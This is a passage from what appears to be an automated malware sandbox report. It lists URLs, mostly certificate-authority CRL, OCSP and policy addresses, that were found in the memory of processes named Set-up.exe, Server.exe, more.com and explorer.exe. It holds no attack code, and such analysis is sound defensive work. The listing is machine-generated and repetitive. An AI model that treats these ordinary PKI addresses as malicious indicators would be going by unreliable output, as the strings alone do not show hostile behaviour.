0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://evcs-aia.ws.symantec.com/evcs.cer0
                  Source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://evcs-crl.ws.symantec.com/evcs.crl0
                  Source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://evcs-ocsp.ws.symantec.com04
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
                  Source: explorer.exe, 00000012.00000002.3689356192.0000000006114000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.ss2.us/
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                  Source: explorer.exe, 00000012.00000003.2509158293.00000000033B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2509465588.000000000338A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2509465588.000000000338A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
                  Source: explorer.exe, 00000012.00000003.2508747671.0000000026785000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
                  Source: explorer.exe, 00000012.00000003.2508747671.0000000026785000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                  Source: explorer.exe, 00000012.00000003.2509878305.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2509158293.00000000033B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
                  Source: explorer.exe, 00000012.00000003.2509427775.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
                  Source: Server.exe, 0000000C.00000002.2396557109.000000000B36A000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000D.00000002.2470851916.00000000047A9000.00000004.00000800.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461023555.000000000B21B000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2483054416.0000000004416000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3676999259.0000000005015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.intel.com/repository/CRL/Intel%20External%20Basic%20Issuing%20CA%203A(1).crl
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.intel.com/repository/CRL/Intel%20External%20Basic%20Policy%20CA.crl
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.intel.com/repository/certificates/Intel%20External%20Basic%20Issuing%20CA%203A(1).crt0u
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.intel.com/repository/certificates/Intel%20External%20Basic%20Policy%20CA.crt0l
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                  Source: explorer.exe, 00000012.00000003.2508747671.0000000026785000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
                  Source: explorer.exe, 00000012.00000002.3693450265.0000000026707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508747671.0000000026785000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
                  Source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.symauth.com/cps0(
